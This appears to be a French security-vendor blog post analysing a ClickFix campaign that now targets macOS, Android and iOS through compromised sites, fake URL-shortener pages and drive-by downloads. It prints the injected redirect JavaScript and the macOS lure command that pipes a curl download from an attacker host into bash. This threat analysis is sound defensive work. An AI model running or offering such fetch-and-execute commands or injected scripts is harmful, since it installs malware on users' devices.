Ce qui a commencé comme une astuce d’ingénierie sociale axée sur Windows s’est transformé en une menace multiplateforme côté client. Dans cet article, nous décomposons une variante récente de ClickFix qui cible désormais macOS, Android et iOS, en utilisant des redirections basées sur le navigateur, de fausses invites d'interface utilisateur et même des techniques de téléchargement en voiture.
Qu'est-ce qu'une attaque ClickFix ?
Les attaques ClickFix ne sont pas nouvelles. Ma première rencontre avec un a eu lieu septembre 2024:
Une attaque ClickFix est une forme d’ingénierie sociale ciblée ou d’attaque côté client qui exploite l’instinct d’un utilisateur pour « simplement résoudre le problème ». Cela commence généralement par un message convaincant qui pointe vers un problème supposé (comme une vulnérabilité de sécurité ou un problème de repo). L'utilisateur est invité à cliquer sur un lien ou à exécuter une commande, croyant résoudre quelque chose d'important.
Dans cet exemple d'attaque, l'utilisateur est invité à exécuter un script dans le terminal. Sous Windows, cela signifiait PowerShell. Naturellement, la même technique fonctionne également sur macOS et Linux. Et tout comme avec Windows, je pensais que les utilisateurs ne tomberaient pas dans le piège.
Toutefois, les hypothèses constituent un jeu dangereux en matière de cybersécurité, ce qui a malheureusement été une fois de plus prouvé.
Nous sommes côté client et nous surveillons les attaques de scripts tiers côté client et améliorons la protection côté client en temps réel pour les sites Web et leurs utilisateurs. Au cours des trois derniers mois seulement, nous avons observé plus de 300 000 sites Web compromis.
Il est intéressant de noter que c’est la deuxième fois que nous annonçons que des attaquants font évoluer leur stratégie. TTP (Tactiques, techniques et procédures).
Mais ce qui était autrefois une menace uniquement Windows cible désormais également d’autres systèmes d’exploitation.
L'attaque en détail
Nous avons reçu une alerte concernant du JavaScript téléchargé depuis :
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16Le script livré :
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Ce JavaScript n'est pas très obscurci, ce qui est rare pour ce type d'attaques. Il crée un gestionnaire de clics pour les éléments avec un nom de classe spécifique qui ouvre une URL dans un nouvel onglet lorsque vous cliquez dessus. Voici ce que cela fait :
- Prend une URL de modèle (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Remplace {KEYWORD} par le titre de la page traitée
- Attache des gestionnaires de clics à tous les éléments avec la classe boutonPress-16
- Lorsqu'on clique dessus, ces éléments ouvrent l'URL construite dans un nouvel onglet
Ci-dessous la chaîne de redirection :
Chaîne de redirection sur l'interface utilisateur
La page apparaît comme un raccourcisseur d'URL et demande à l'utilisateur de copier un lien. Les attaquants abusent de cutt[.]ly, un raccourcisseur d'URL légitime.
Lorsqu'un utilisateur colle l'URL raccourcie dans le navigateur, il le redirige vers :
Cette page de raccourcissement d'URL imitée affiche la fenêtre contextuelle suivante :
"Collez le lien que vous avez copié dans la ligne d'adresse du navigateur."
Il redirige ensuite l'utilisateur vers une page de téléchargement (dans ce cas pour macOS) :
/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
Le contenu de ce fichier shell est le suivant dans cette capture d'écran :
Ce script shell télécharge ensuite un Exécutable macOS (détecté par 10 moteurs antivirus sur VirusTotal).
Comportement Android et iOS
Lorsque nous l'avons testé sur Android et iOS, nous nous attendions à une variante ClickFix. Mais au lieu de cela, nous avons rencontré un attaque au volant.
Une attaque au volant est un type de cyberattaque dans laquelle un code malveillant est exécuté ou téléchargé sur un appareil simplement en visitant une page Web compromise ou malveillante. Aucun clic, installation ou interaction requis.
La page nous redirige maintenant vers :
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Ce site a téléchargé un fichier .tar - 7zip protégé par un mot de passe - qui a extrait et supprimé le malware (détecté par 5 moteurs AV). Et détecté par 5 fournisseurs sur VirusTotal.
Détecté par 5 fournisseurs sur VirusTotal.
Ce style d’attaque drive-by a été utilisé sur Android et Windows.
Il s’agit d’une attaque fascinante et évolutive qui démontre à quel point les attaquants étendent leur portée. Ce qui a commencé comme une campagne ClickFix spécifique à Windows cible désormais macOS, Android et iOS. Élargir considérablement l’échelle de l’opération.
C’est un autre rappel de la façon dont les attaques côté client se propagent à grande échelle et des différentes formes qu’elles peuvent prendre, le tout en exploitant la confiance que les utilisateurs accordent aux interactions du navigateur lorsque la sécurité côté client est absente ou mal appliquée.
